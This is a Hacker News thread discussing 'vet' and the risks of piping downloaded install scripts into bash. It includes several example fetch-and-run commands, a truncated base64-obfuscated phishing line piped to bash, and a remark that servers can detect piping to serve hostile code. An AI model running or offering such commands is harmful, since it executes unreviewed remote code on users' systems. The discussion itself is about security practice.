Vet is a safety net for the curl | bash pattern

209 mooreds 189 7/24/2025, 12:47:29 PM github.com ↗

Comments (189)

pxeger1 · 1d ago
My problem with curl|bash is not that the script might be malicious - the software I'm installing could equally be malicious. It's that it may be written incompetently, or just not with users like me in mind, and so the installation gets done in some broken, brittle, or non-standard way on my system. I'd much rather download a single binary and install it myself in the location I know it belongs in.
jerf · 1d ago
I've also seen really wonderfully-written scripts that, if you read them manually, allow you to change where whatever it is is installed, what features it may have, optional integration with Python environments, or other things like that.

I at least skim all the scripts I download this way before I run them. There's just all kinds of reasons to, ranging all the way from the "is this malicious" to "does this have options they're not telling me about that I want to use".

A particular example is that I really want to know if you're setting up something that integrates with my distro's package manager or just yolo'ing it somewhere into my user's file system, and if so, where.

inetknght · 1d ago
> I've also seen really wonderfully-written scripts that

I'll take a script that passes `shellcheck ./script.sh` (or, any other static analysis) first. I don't like fixing other people's bugs in their installation scripts.

After that, it's an extra cherry on top to have everything configurable. Things that aren't configurable go into a container and I can configure as needed from there.

sim7c00 · 1d ago
right? read before u run. if you cant make sense of it all, dont run. if you can make sense of it all, you're free to refactor it to your own taste :) saves some time usually. as you say, a lot are quite nicely written
groby_b · 1d ago
> read before u run

Lovely sentiment, not applicable when you actually work on something. You read your compiler/linker, your OS, and all libraries you use? Your windowing system? Your web browser? The myriad utilities you need to get your stuff done? And of course, you've read "Reflections on trusting trust" and disassembled the full output of whatever you compile?

The answer is "you haven't", because most of those are too complex for a single person to actually read and fully comprehend.

So the question becomes, how do you extend trust. What makes a shell script untrustworthy, but the executable you or the script install trustworthy?

homebrewer · 11h ago
Non-system software, which is what often gets installed with this method, typically does not get root privileges on my systems, or at least is not expected to write anything into directories like /usr.

These scripts are often written by people who only know one OS well (if any), and if that OS is macOS, and you're on Linux (or FreeBSD, or whatever), you can expect them to do weird shit like sticking binaries into /usr/bin in circumvention of the package manager, or adding their own package repositories without asking you (and often not whitelisting just their packages, which allows them to e.g. replace glibc on your system without you noticing), etc.

It's not comparable to simply using the already installed software.

jerf · 7h ago
"What makes a shell script untrustworthy, but the executable you or the script install trustworthy?"

Supply-chain attacks. Linux distros have a long history of being more hardened targets than "a static file on some much, much, much smaller project's random server".

Also things like linux packages or snaps or flatpaks are generally somewhat ringfenced by their nature. Here I don't mean for security reasons per se, but just by their nature, I have confidence a flatpak isn't going to start scribbling all over my user directory. A script may make any number of assumptions about what it is OK to do, where things can go, where to put them, what it can install, etc.

"Trust" isn't just about whether something is going to steal my cryptowallet or install a keylogger. It's about whether it breaks my reproducible ops setup, or will stick configuration in the seventeenth place in my system, or assumes other false things about how I want it set up that may cause other problems.

spookie · 22h ago
Binaries in the Linux world are usually retrieved the "Official Way". You use a distro. Therefore you trust "them" and how they operate their package manager.

This is the "Unofficial Way".

sim7c00 · 13h ago
well read before u run was obviously for the shell script not gcc sources :'l. i dont think thats a fair comparisson. but you do make a good point. its why i write my own OS :D and yes, once that is up own toolchain would be next, as an experiment to see what'd be needed to be secure ,even forgetting ofc the hw we run on. wasnt planning to play with horrible acids to see what is in there, tho its possible.. :D. (it will never be finish in my life haha, i know...).
AndyMcConachie · 1d ago
100% agree. The question of whether I should install lib-X for language-Y using Y's package management system or the distribution's package management system is unresolved.
Diti · 1d ago
It’s solved by Nix. Whichever package management you choose (nixpkgs or pip or whatever), the derivation should have the same hash in the Nix store.

(Nix isn’t the solution for OP’s problems though – Nix packages are unsigned, so it’s it’s basically backdoor-as-a-service.)

ants_everywhere · 18h ago
The Nix installer is one of the more shocking curl | bash experiences I've had.

It created users and groups on my system! And the uninstall script didn't clean it up.

mingus88 · 1d ago
My problem with it is that it encourages unsafe behavior.

How many times will a novice user follow that pattern until some jerk on discord drops a curl|bash and gets hits

IRC used to be a battlefield for these kinds of tricks and we have legit projects like homebrew training users it’s normal to raw dog arbitrary code direcly into your environment

SkiFire13 · 1d ago
What would you consider a safer behaviour for downloading programs from the internet?
mingus88 · 1d ago
You are essentially asking what is safer than running arbitrary code from the internet sight unseen directly into your shell and I guess my answer would be any other standard installation method!

The OS usually has guardrails and logging and audits for what is installed but this bypasses it all.

When you look at this from an attackers perspective, it’s heaven.

My mom recently got fooled by a scammer that convinced her to install remote access software. This curl pattern is the exact same vector, and it’s nuts to see it become commonplace

SkiFire13 · 9h ago
> You are essentially asking what is safer than running arbitrary code from the internet

No, I'm asking what is a safer method when I want to install some code from the internet.

> The OS usually has guardrails and logging and audits for what is installed but this bypasses it all.

Not everything is packaged or up-to-date in the OS

> My mom recently got fooled by a scammer that convinced her to install remote access software.

Remote access software are packaged in distros too.

thayne · 16h ago
> My mom recently got fooled by a scammer that convinced her to install remote access software.

But I bet she didn't install it with curl piped to bash. The point isn't that curl|bash is safe, but that it isn't inherently more dangerous than downloading and running a program.

thewebguyd · 1d ago
Use your distro's package manager and repos first and foremost. Flatpak is also a viable alternative to distribution, and if enabled, comes along with some level of sandboxing at least.

"Back in the day" we cloned the source code and compiled ourself instead of distributing binaries & install scripts.

But yeah, the problem around curl | bash isn't the delivery method itself, it's the unsafe user behavior that generally comes along with it. It's the *nix equivalent of downloading an untrusted .exe from the net and running it, and there's no technical solution for educating users to be safe.

Safer behavior IMO would be to continue to encourage the use of immutable distros (Fedora silverbue and others). RO /, user apps (mostly) sandboxed, and if you do need to run anything untrusted, it happens inside a distrobox container.

BHSPitMonkey · 23h ago
I've installed untold thousands of .deb packages in my lifetime - often "officially" packaged by Debian or Ubuntu, but in many cases also from a software vendor's own apt repository.

Almost every one contains preinst or postinst scripts that are run as root, and yet I can count on zero hands the number of times I've opened one up first to see what it was actually doing.

At least a curlbash that doesn't prompt me for my password is running as an unprivileged user! /shrug

SkiFire13 · 9h ago
Getting every software into every distro is not feasible, it's a NxM problem. Sometimes this encourages the use of third-party repositories, which I would argue is even unsafer because it requires root access.

Flatpak is a nice suggestion but unfortunately it doesn't seem to work nicely for CLIs.

> "Back in the day" we cloned the source code and compiled ourself instead of distributing binaries & install scripts.

Isn't that the same thing with the extra step of downloading a git repo?

sim7c00 · 1d ago
a lot of useful packages are not in package managers, or are in old versions that lack features u need. so its quite common to need to get around that...
papichulo2023 · 1d ago
Funny enough clone and compile is easier now than ever before. You can ask a llm to create a docker to compile any random program and most of the time will be okay.
hsbauauvhabzb · 1d ago
R/O root means a a binary will fail to install, but won’t stop my homedir being backdoored in a DD Orion to the huge waste of time that attempting an RO root would be.
bawolff · 1d ago
Literally anything else.

Keep in mind that its possible to detect when someone is doing curl | bash and only send the malicious code when curl is being piped, to make it very hard to detect.

SoftTalker · 1d ago
curl | tee foo.sh

and then inspect foo.sh and then (maybe) cat foo.sh | bash

Does that avoid the issue?

broken-kebab · 1d ago
Yes, but will you do it really?
codedokode · 1d ago
Software should run in a sandbox. Look at Android for example.
troupo · 1d ago
> My problem with it is that it encourages unsafe behavior.

Then why don't Linux distributions encourage safe behaviour? Why do you still need sudo permissions to install anything on most Linux systems?

> How many times will a novice user follow that pattern until some jerk on discord

I'm not a novice user and I will use this pattern because it's frankly easier and faster, especially when the current distro doesn't have some combination of things installed, or doesn't have certain packages, or...

keyringlight · 1d ago
I think a lot of this comes down to assumptions about the audience and something along the lines of "it's not a problem until it is". It's one aspect I wonder about with migrants from windows, and all the assumptions or habits they bring with them. Microsoft has been trying to put various safety rails around users for the past 20 years since they started taking security more seriously with xp, and that gets pushback every time they try and restrict or warn.
ChocolateGod · 23h ago
> Why do you still need sudo permissions to install anything on most Linux systems?

You don't with Flatpak or rootless containers, that's partially why they're being pushed so much.

They don't rely on setuid for it either

johnisgood · 22h ago
Flatpak and AppImage.

Or download & compile & install to a PREFIX (e.g. ~/.local/pkg/), and use a symlink-manager to install to e.g. ~/local (and set MANPATH accordingly, too). Make sure PATH contains ~/.local/bin, etc. It does not work with Electron apps though. I do "alias foo="cd ... && ./foo".

aragilar · 11h ago
Because you're making system-wide changes which affect more than just your user?

There are and there has been distros that install per user, but at some level something needs to manage the hardware and interfaces to it.

troupo · 7h ago
> Because you're making system-wide changes which affect more than just your user?

Am I? How am I affecting other users by installing something for myself?

Even Windows has had "Install just for this user or all users?" for decades

mingus88 · 19h ago
I’m not a novice user anymore either, but I care about my security and privacy.

When I see a package from a repo, I have some level of trust. Same with a single binary from GitHub.

When I see a curl|bash I open it up and look at it. Who knows what the heck is doing. It does not save me any time and in fact is a huge waste of time to wade through random shell scripts which follow a dozen different conventions because shell is ugly.

Yes you could argue an OS package runs scripts too that are even harder to audit but those are versioned and signed and repos have maintainers and all kinds of things that some random http GET will never support.

You don’t care? Cool. Doesn’t mean it’s good or safe or even convenient for me.

troupo · 6h ago
Repos and maintainers etc. are just a long unauditable supply chain [1]. And everyone is encouraged to blindly trust this chain with sudo access.

It's worse than that. If your distro doesn't have some package, you're encouraged to just add PPA repos and blindly trust those.

Quite a few companies run their own repos as well, and adding their packages is again `sudo add repo; sudo install`

Yes, it's not as egregious as just `curl | bash`, but it's not as far removed from it as you think.

[1] E.g. https://en.wikipedia.org/wiki/XZ_Utils_backdoor

umanwizard · 23h ago
> Why do you still need sudo permissions to install anything on most Linux systems

Not guix :)

One of the coolest things about it.

IgorPartola · 23h ago
This exactly. You never know what it will do. Will it simply check that you have Python and virtualenv and install everything into a single directory? Or will it hijack your system by adding trusted remote software repositories? Will it create new users? Open network ports? Install an old version of Java it needs? Replace system binaries for “better” ones? Install Docker?

Operating systems already have standard ways of distributing software to end users. Use it! Sure maybe it takes you a little extra time to do a one off task of adding the ability to build Debian packages, RPM, etc. but at least your software will coexist nicely with everything else. Or if your software is such a prima-donna that it needs its own OS image, package it in a Docker container. But really, just stop trying to reinvent the wheel (literally).

stouset · 1d ago
Yes! What I really want from something like this is sandboxing the install process to give me a guaranteed uninstall process.
mjmas · 22h ago
tinycorelinux reinstalls its extensions into a tmpfs every boot which works nicely. (and you can have different lists of extensions that get loaded)
hsbauauvhabzb · 1d ago
Why would you possibly want to remove my software?
ChocolateGod · 23h ago
This reminded me how if you wanted to remove something like cPanel back in the day your really only option was to just reinstall the whole OS.
1vuio0pswjnm7 · 22h ago
Many times a day both in scripts and interactively I use a small program I refer to as "yy030" that filters URLs from stdin. It's a bit like "urlview" but uses less complicated regex and is faster. There is no third party software I use that is distributed via "curl|bash" and in practice I do not use curl or bash, however if I did I might use yy030 to extract any URLs from install.sh something like this

    curl https://example.com/install.sh|yy030
or

    curl https://example.com/install.sh > install.sh
    yy030 < install.sh
Another filter, "yy073", turns a list of URLs into a simple web page. For example,

    curl https://example.com/install.sh|yy030|yy073 > 1.htm
I can then open 1.htm in an HTML reader and select any file for download or processing by any program according to any file associations I choose, somewhat like "urlview".

I do not use "fzf" or anything like that. yy030 and yy073 are small static binaries under 50k that compile in about 1 second.

I also have a tiny script that downloads a URL received on stdin. For example, to download the third URL from install.sh to 1.tgz

     yy030 < install.sh|sed -n 3p|ftp0 1.tgz
"ftp" means the client is tnftp

"0" means stdin

nikisweeting · 23h ago
This is always the beef that I've had with it. Particularly the lack of automatic updates and enforced immutable monotonic public version history. It leads to each program implementing its own non-standard self-updating logic instead of just relying on the system package managers. https://docs.sweeting.me/s/against-curl-sh
shadowgovt · 1d ago
Much of the reason `curl | bash` grew up in the Linux ecosystem is that "single binary that just runs" approach isn't really feasible (1) because the various distros themselves don't adhere to enough of a standard to support it. Windows and MacOS, being mono-vendor, have a sufficiently standardized configuration that install tooling that just layers a new application into your existing ecosystem is relatively straightforward: they're not worrying about what audio subsystem you installed, or what side of the systemd turf war your distro landed on, or which of three (four? five?) popular desktop environments you installed, or whether your `/dev` directory is fully-populated. There's one answer for the equivalent of all those questions on Mac and Win so shoving some random binary in there Just Works.

Given the jungle that is the Linux ecosystem, that bash script is doing an awful lot of compatibility verification and alternatives selection to stand up the tool on your machine. And if what you mean is "I'd rather they hand me the binary blob and I just hook it up based on a manifest they also provided..." Most people do not want to do that level of configuration, not when there are two OS ecosystems out there that Just Work. They understandably want their Linux distro to Just Work too.

(1) feasible traditionally. Projects like snap and flatpak take a page from the success Docker has had and bundle the executable with its dependencies so it no longer has to worry about what special snowflake your "home" distro is, it's carrying all the audio / system / whatever dependencies it relies upon with it. Mostly. And at the cost of having all these redundant tech stacks resident on disk and in memory and only consolidateable if two packages are children of the same parent image.

fouc · 1d ago
I first encountered `curl | bash` in the macOS world, most specifically with installing the worst package manager ever, homebrew, which first came out in 2009. Since then it's spread.

I call it the worst because it doesn't support installing specific versions of libraries, doesn't support downgrading, etc. It's basically hostile and forces you to constantly upgrade everything, which invariably leads to breaking a dependency and wasting time fixing that.

These days I mostly use devbox / nix at the global level and mise (asdf compatible) at the project level.

ryandrake · 1d ago
Ironic, because macOS's package management system is supposed to be the simplest of all! Applications are supposed to just live in /Applications or ~/Applications, and you're supposed to be able to cleanly uninstall them by just deleting their single directory. Not all 3rd party developers seem to have gotten that memo, and you frequently see crappy and unnecessary "installers" in the macOS world.

There may be good or bad reasons why Homebrew can't use the standard /Applications pattern, but did they have to go with "curl | bash"?

Wowfunhappy · 1d ago
The Applications folder system does work really well for GUI apps! It's not really made for command line apps.

For command line apps, the equivalent would probably be statically-compiled binaries you can just drop somewhere in your PATH, e.g. /usr/local/bin/. For programs that are actually built this way (which I would personally call "the correct way") this works great!

Nab443 · 20h ago
I would not call apps built statically "the correct way". It offers benefits but also drawbacks. One of them being that you can't update statically linked libraries in it with security fixes without replacing the binary completely, which can be an issue if the context does not allow it (unsupported proprietary software, lost dependency code, ...). It can also lead to resource consumption faster, which can be an issue in resource constrained systems.
int_19h · 15h ago
If the app is actively maintained, it will update the dependency to fix the security issue.

If the app is not actively maintained, unless trivial, it likely has unpatched vulnerabilities of its own anyway.

And on macOS, if the app is not actively maintained, it usually breaks after a couple major releases regardless of anything else, because Apple doesn't believe in backwards compatibility.

Wowfunhappy · 20h ago
I know, I said that I would call it the correct way. :) I'm aware of the drawbacks, I just think they're clearly outweighed by the benefits.

If nothing else, consider that the limitations of a statically linked binary match those of a traditional Mac application bundle. While Mac apps are usually dynamically linked, they also include all of their dependencies within the app bundle. I suppose you could argue it's technically possible to open an app bundle and replace one of the dylibs, but this is clearly not an intended use case; if nothing else, you're going to break the code signature.

thewebguyd · 1d ago
> Not all 3rd party developers seem to have gotten that memo

This frustrates me to no end on macOS. Not only do you see crappy installers like you said, but a ton of applications now aren't even self contained in ~/Applications like they should be.

Apps routinely shit all over ~/Library when they don't need to, and don't clean up after themselves so just deleting the bundle, while technically 'uninstalls' it, you still have stuff left over, and it can eat up disk space fast. Same crap that Windows installers do, where they'll gladly spread the app all over your file system and registry but the uninstaller doesn't actually keep track of what went where so it'll routinely miss stuff. At least Windows as a built-in disk clean up tool that can recognize some of this for you, macOS will just happily let apps abuse your file system until you have to go digging.

Package managers on Linux solved this problem many, many years ago and yet we've all collectively decided to just jump on the curl | bash train and toss the solution to the curb because...reasons?

ryandrake · 1d ago
Yep, same problem on Windows. It's almost always a mistake to give 3rd party developers unrestricted access to your filesystem, because they don't care and will shit their files all over it.

I wish more applications were distributed by the Mac App Store, because I believe App Store distributed apps are more strongly sandboxed and may not allow developers to abuse your system like this.

ChocolateGod · 23h ago
Mac apps outside the app store can still be sandboxed, but they have to be signed.
shadowgovt · 1d ago
"Reasons" is "Nobody wants to wait for the package maintainers to decide that their favorite new shiny toy is enough a priority to update it to a version recent enough to match the online documentation for the new shiny toy," mostly.

As I mentioned somewhere side-thread: Debian Unstable is only three minor versions behind the version of Rust that the Rust team is publishing as their public release, but Debian Stable is three years old. For some projects, that dinosaur-times speed. If I want to run Debian Stable for everything except Rust, I'm curl-bashing it.

ryandrake · 1d ago
As a user, if you need to run recent versions of your tools, I'd argue Debian (at least Debian Stable) is not for you. Luckily we have many choices among Linux distributions!
int_19h · 15h ago
There's nothing wrong with Debian for running recent versions of your dev tools; you just shouldn't expect to get them from the official Debian repositories. But there are third-party repositories for things like e.g. latest Node versions. I would expect there to be something for Rust, as well, but apparently they are also packaging rustup now.
CharlesW · 1d ago
> …did they have to go with "curl | bash"?

That's one of many options, documented at the first text link of the home page. https://docs.brew.sh/Installation

ryandrake · 1d ago
Wow, they even have a .pkg installer. Had no idea. Is this new?
CharlesW · 1d ago
Without going too far down the rabbit hole, it looks like the maintainers added it in 2023. In the process, I was reminded that the installer initially required Ruby! (/usr/bin/ruby -e "$(curl…)

FYI, mas is the equivalent of a package manager for macOS apps (a.k.a. a CLI for App Store). https://github.com/mas-cli/mas

Other than brew, I use mise for everything I can. https://mise.jdx.dev/

tghccxs · 1d ago
Why is homebrew the worst? Do you have a recommendation for something better? I default to homebrew out of inertia but would love to learn more.
xmodem · 1d ago
I've been using MacPorts since before homebrew existed and never switched away.
fouc · 1d ago
Lately I've been using devbox (nix wrapper) for my homebrew-like needs via "devbox global add <whatever>", for project specific setup I stick with mise (asdf-compatible)."

I don't like homebrew because I've been burnt multiple times because it often auto-updates when you least want it to and breaks project dependencies.

And there's no way to downgrade to a specific version. Real package managers typically support versioning.

antihero · 1d ago
If you're depending on specific versions, don't use a general system package manager, use something like mise or asdf.
CharlesW · 1d ago
MacPorts is a good alternative, but you'll find that Homebrew is absolutely not the worst. Personally, I find brew fast and reliable. Look at mise (`brew install mise`) for managing any developer dependencies. https://mise.jdx.dev/
ryao · 1d ago
I am a fan of Gentoo Prefix. Others like pkgsrc.
fouc · 17h ago
I've heard of some people using pkgsrc as their package manager in macOS. First time I heard about Gentoo Prefix. neat!
chme · 1d ago
nix possible with lix, if you can stomach nix syntax.
fouc · 17h ago
devbox is a nice wrapper for nix syntax. thanks for the tip about lix, it looks like I can use devbox+lix instead of the determinate nix installer.
snickerdoodle12 · 1d ago
apt and yum/dnf are pretty great
JoshTriplett · 20h ago
Statically link a binary with musl, and it'll work on the vast majority of systems.

> they're not worrying about what audio subsystem you installed

Some software solves this by autodetecting an appropriate backend, but also, if you use alsa, modern audio systems will intercept that automatically.

> what side of the systemd turf war your distro landed on

Most software shouldn't need to care, but to the extent it does, these days there's systemd and there's "too idiosyncratic to support and unlikely to be a customer". Every major distro picked the former.

> or which of three (four? five?) popular desktop environments you installed

Again, most software shouldn't care. And `curl|bash` doesn't make this any easier.

> or whether your `/dev` directory is fully-populated

You can generally assume the devices you need exist, unless you're loading custom modules, in which case it's the job of your modules to provide the requisite metadata so that this works automatically.

networked · 1d ago
You can also use vipe from moreutils:

  curl -sSL https://example.com/install.sh | vipe | sh
This will open the output of the curl command in your editor and let you review and modify it before passing it on to the shell. If it seems shady, clear the text.

vet looks safer. (Edit: It has the diff feature and defaults to not running the script. However, it also doesn't display a new script for review by default.) The advantage of vipe is that you probably have moreutils available in your system's package repositories or already installed.

TZubiri · 1d ago
Huh

Why not just use the tools separately instead of bringing a third tool for this.

Curl -o script.sh

Cat script.sh

Bash script.sh

What a concept

networked · 1d ago
What it comes down to is that people want a one-liner. Telling them they shouldn't use a one-liner doesn't work. Therefore, it is better to provide a safer one-liner.

This assumes that securing `curl | sh` separately from the binaries and packages the script downloads makes sense. I think it does. Theoretically, someone can compromise your site http://example.com with the installation script https://example.com/install.sh but not your binary downloads on GitHub. Reviewing the script lets the user notice that, for example, the download is not coming from the project's GitHub organization.

bawolff · 1d ago
If you are really paranoid you should use cat -v, as otherwise terminal control characters can hide the malicious part of the script.
panki27 · 23h ago
At this point, the whole world is just a complexity Olympiad
adolph · 1d ago
Same but less instead of cat so my fingers stay in the keyboard.

Vet, vite, etc are kind of like kitchen single-taskers like avocado slicer-scoopers. Surely some people get great value out of them but a table-knife works just fine for me and useful in many task flows.

I'd get more value out of a cross-platform copy-paster so I'm not skip-stepping in my mind between pbpaste and xclip.

hsbauauvhabzb · 1d ago
Have you tried aliases?
adolph · 1d ago
For pbpaste/pbcopy and xclip? I've considered it and haven't decided how to do it yet given differences in how they work. Do you have one?

https://linux.die.net/man/1/xclip

https://ss64.com/mac/pbcopy.html

https://man.openbsd.org/xclipboard.1

procaryote · 21h ago
I do

    if ! which pbcopy &> /dev/null; then
        alias pbcopy="xclip -selection clipboard"
        alias pbpaste="xclip -o -selection clipboard"
    fi
The `if` bit is so it only adds the alias if there isn't a `pbcopy`, so I can use the same dotfile on mac and linux
hsbauauvhabzb · 19h ago
I’m honestly not familiar with pbcopy, but I imagine you could make a relatively consistent wrapper in python if a simple alias does not work. Are you able to give some example shell code of what you’d like to be consistent?
jjgreen · 1d ago
Splendid idea, especially since "curl | bash" can be detected on the server [1] (which if compromised could serve hostile content to only those who do it)

[1] https://web.archive.org/web/20250622061208/http://idontplayd...

IshKebab · 1d ago
This is one of those theoretical issues that has absolutely no practical implications.
dgl · 19h ago
Here's an example of a phish actually using it: https://abyssdomain.expert/@filippo/114868224898553428 (also note "cat" is potentially another antipattern, less -U or cat -v is what you want).
IshKebab · 2h ago
Sure so how many people do you think saw `echo "Y3Vy[...]ggJg==" | base64 -d | bash` and thought "hmm that's suspicious, I'd better check what it is is doing... Ah it's curling another bash script. I'd better see what that script is. Downloads script. Ah I see, a totally legit script. All is well, I'll run the command!"

Its zero. Zero people. Nobody is competent enough to download and review a bash script and also not recognise this obvious scam.

They probably threw the pipe detection in just because they could (and because it's talked about so frequently).

falcor84 · 1d ago
Yes, ... but if the server is compromised, they could also just inject malware directly into the binary that it's installing, right? As I see it, at the end of the day you're only safe if you're directly downloading a package whose hash you can confirm via a separate trusted source. Anything else puts you at the mercy of the server you're downloading from.
sim7c00 · 1d ago
depending on what you run one method might have more success than another. protections for malicious scripts vs. modified binaries are often different tools or different components of the same tool that can have varying degrees of success.

you could also use the script to fingerprint and beacon to check if the target is worth it and what you might want to inject into said binary if thats your pick.

still i think i agree, if you gonna trust a binary from that server or a scripts its potato potato...

check what you run before you run it with whatever tools or skills u got and hope for the best.

if you go deepest into this rabbithole, you cant trust your hard disk or network card etc. so its then at some point just impossible to do anyhting. microcode patches, malicious firmwares, whatever.

for pragmatic reasons line needs to be drawn. if your paranoid good luck and dont learn too much about cybersecurity, or you will need to build your own computer :p

baq · 1d ago
we've been curl | bashing software on windows since forever, it was called 'downloading and running an installer' and yes, there was the occasional malware. the solution to that was antivirus software. at this point even the younger hners should see how the wheel of history turns.

meanwhile, everyone everywhere is npm installing and docker running without second thoughts.

inanutshellus · 1d ago
> meanwhile, everyone everywhere is npm installing and docker running without second thoughts.

Well... sometimes like, say, yesterday [1], there's a second thought...

  [1] https://www.bleepingcomputer.com/news/security/npm-package-is-with-28m-weekly-downloads-infected-devs-with-malware/
simonw · 1d ago
"the solution to that was antivirus software"

How well did that work out?

thewebguyd · 1d ago
> How well did that work out?

Classic old school antivirus? Not great, but did catch some things.

Modern EDR systems? They work extremely well when properly set up and configured across a fleet of devices as it's looking for behavior and patterns instead of just going off of known malware signatures.

maccard · 22h ago
My last job had a modern endpoint detection system running on it and my 7 year old MacBook was as quick as my top of the line i9 processor because of it. I have never seen software destroy a systems performance as much as carbon black, crowdstrike and cortex do.

They’re also not exactly risk free - [0]

[0] https://en.m.wikipedia.org/wiki/2024_CrowdStrike-related_IT_...

panki27 · 23h ago
If modern EDR systems are so great without relying on classical signature matching, then why are they still doing it? Why do they keep fetching "definition databases" as often as possible?

... because it's the only thing that somewhat works. From my personal experience, the heuristic and "AI-based" approaches lead to so many false positives, it's not even worth pursuing them.

The best AV remains and will always be common sense.

esafak · 1d ago
Great. It motivated me to drop kick Windows and move to Linux and MacOS.
nicce · 1d ago
Do you know how deeply integrated anti-virus is on macOS?
esafak · 1d ago
No, and I haven't encountered a virus either. During the Microsoft era viruses frequently did the rounds, becoming water cooler talk.
maccard · 22h ago
That’s mostly because applications themselves got way more secure.
bongodongobob · 1d ago
As someone who manages 1000s of devices, great.
Cthulhu_ · 1d ago
"everyone else" is using an app store that has (read: should have) vetted and reviewed applications.
tonymet · 21h ago
windows has had ACLs and security descriptors for 20+ years. Linux is a super user model.

Windows Store installs, so about 75% of installs, install sandboxed and no longer need escalation.

The remaining privileged installs that prompt with UAC modal are guarded by MS Defender for malicious patterns.

Comparing sudo <bash script> to any Windows install is 30+ years out of date. sudo can access almost all memory, raw device access, and anywhere on disk.

eredengrin · 14h ago
> Comparing sudo <bash script> to any Windows install is 30+ years out of date. sudo can access almost all memory, raw device access, and anywhere on disk.

They didn't say anything about sudo, so assuming global filesystem/memory/device/etc access is not really a fair comparison. Many installers that come as bash scripts don't require root. There are definitely times I examine installer scripts before running them, and sudo is a pretty big determining factor in how much examination an installer will get from me (other factors include the reputation of the project, past personal experience with it, whether I'm running it in a vm or container already, how I feel on the day, etc).

tonymet · 4h ago
Even comparing non sudo / non-privileged, Windows OS & Defender have many more protections. Controlled Folder Access restricts access to most of the home directory . And Defender Real-time is running during install and run. Windows stores secrets in TPM, which isn’t used on Linux desktop. The surface area of malicious code is much smaller.

A bash script is only guarded by file system permissions. All the sensitive content in the home directory is vulnerable. And running sudo embedded would mostly succeed.

ndsipa_pomu · 1d ago
At least with curl and bash, the code is human readable, so it's easy to inspect it as long as you have some basic knowledge of bash scripts.
fragmede · 1d ago
software running in docker's a bit more sandboxed than running outside of it, even if it's not bulletproof.
johnfn · 1d ago
Am I missing something? Even if you do `vet foobar-downloader.sh` instead of `curl foobar-downloader.sh | bash`, isn't your next command going to be to execute `foobar` regardless, "blindly trusting" that all the source in the `foobar` repository isn't compromised, etc?
lr0 · 1d ago
No it says that it will show you the script first so you can review it. What I don't get is why do you nee d a program for this, you can simple curl the script to a file, `cat` it, and review it.
simonw · 1d ago
It shows you the installation script but that doesn't help you evaluate if the binary that the script installs is itself safe to run.
dotancohen · 23h ago
Right, this tool does one thing - make it easy to see the script. Another tool does something else. That's kind of the UNIX Philosophy.
geysersam · 1d ago
Yes but even if you inspect the code of the installation script the program you just installed might still be compromised/malicious? It doesn't seem more likely that an attacker managed to compromise an installation script, than that they managed to compromise the released binary itself.
loloquwowndueo · 1d ago
If you’re just going to run it blindly you don’t need vet. It’s not automatic - just gives you a chance to review the script before run I h it.
jrm4 · 23h ago
As an old-timer, going through this thread, I must say that there's just not enough hate for the whole Windows/Mac OS inclination to not want to let users be experimental.

Everyone here is sort of caught up in this weird middle ground, where you're expecting an environment that is both safe and experimental -- but the two dominant Oses do EVERYTHING THEY CAN to kill the latter, which, funny enough, can also make the former worse.

Do not forget, for years you have been in a world in which Apple and Microsoft do not want you to have any real power.

Galanwe · 1d ago
The whole point of "curl|bash" is to skip dependency on package managers and install on a barebone machine. Installing a tool that allow to install tools without installation tool is...
chii · 1d ago
but then it needs to come with a curl|bash uninstall tool. Most of these install scripts are just half the story, and the uninstalling part doesn't exist.
ryandrake · 1d ago
Sadly, a great many 3rd party developers don't give a single shit about uninstallation, and won't lift a finger to do it cleanly, correctly and completely. If their installer/packager happens to do it, great, but they're not going to spend development cycles making it wonderful.
thewebguyd · 1d ago
This is why its so upsetting over in Linux land how so many people are just itching to move away from distro package managers and package maintainers. Curl | bash is everywhere now because "packaging is hard" and devs can't be arsed to actually package their software for the OS they developed it for.

Like, yeah I get it - it's frustrating when xyz software you want isn't in the repos, but (assuming it's open source) you're also welcome to package it up for your distro yourself. We already learned lessons from Windows where installers and "uninstallers" don't respect you or your filesystem. Package managers solved this problem many, many years ago.

maccard · 22h ago
What package manager would you recommend that allows a one line install on windows (wsl), Mac, debian, fedora and arch?
jrpear · 21h ago
For those install scripts which allow changing the install prefix (e.g. autoconf projects---though involving a built step too), I've found GNU Stow to be a good solution to the uninstall situation. Install in `/usr/local/stow` or `~/.local/stow` then have Stow set up symlinks to the final locations. Then uninstall with `stow --delete`.
ndsipa_pomu · 1d ago
Most of the time I've seen curl|bash, it is to add a repository source to the package manager (debian/ubuntu).
nikisweeting · 23h ago
this is the only sane way to do it, curl|sh should just automate the package manager commands
totetsu · 12h ago
Isn't it better to run with firejail or bubblewrap to contain the changes to an overlayfs or whatever and see exactly what the script would do before running it?
smallerfish · 10h ago
Yes but it's clunky as hell. We need something like a curl x.sh | firejail --new, which prompts a) do you want overlayfs? b) do you want network isolation? c) do you want to allow home directory access?

And then, some equivalent for actually running whatever was installed. This would need to introspect what the installation script did and expose new binaries, which of course run inside the sandbox when invoked.

To move past the "| bash" lazy default, people need an easy to remember command. The complexity of the UI of these tools hinders adoption.

aezart · 1d ago
I think aside from any safety issues, another reason to prefer a deb or something over curl | bash is that it lets your package manager know what you're installing. It can warn you about unmet dependencies, it knows where all the individual components are installed, etc. When I see a deb I feel more confident that the software will play nicely with other stuff on the system.
mid-kid · 10h ago
In my experience, too many of these curl scripts are a bootstrap for another script or tarball which gets downloaded from somewhere else, and then downloads more stuff. Looking at just the main script tells you nothing. Consider for example the rust install procedure: It downloads a binary rustup, for bootstrapping, which then does the installation procedure and embeds itself into your system, and then downloads the actual compiler, and you have no chance of verifying the whole chain, nor really knowing what it changes until after the fact. Consider also systems like `pip` which through packages like puccinialin do the same inscrutable installation procedure, when a rust-based python package needs to be compiled.

Suffice to say, it's best to avoid any of this, and do it using the package manager, or manually. I only run scripts like this on systems that I otherwise don't care about, or in throwaway containers.

gchamonlive · 1d ago
I like that vet, which wraps the `curl | bash` pattern, can be installed via the `curl | bash` pattern but it's documented under https://github.com/vet-run/vet?tab=readme-ov-file#the-trusti....

I don't see it in arch's aur though. That would be my preferred install method. Maybe I'd take a look at it later if it's really not available there.

sgc · 1d ago
Given the conversations in this thread about the annoying package management that leads to so much use of curl | bash, I have a question: Which Linux distro is the least annoying in this regard? Specifically, I mean 1) packages are installed in a predictable location (not one of 3-5 legacy locations, or split between directories); 2) configuration files are installed in a predictable location; 3) Packages are up to date; 4) There is a a large selection of software in the repositories; 5) Security is a priority for the distro maintainers; 6) It's not like pulling teeth if I want/need to customize my setup away from the defaults.

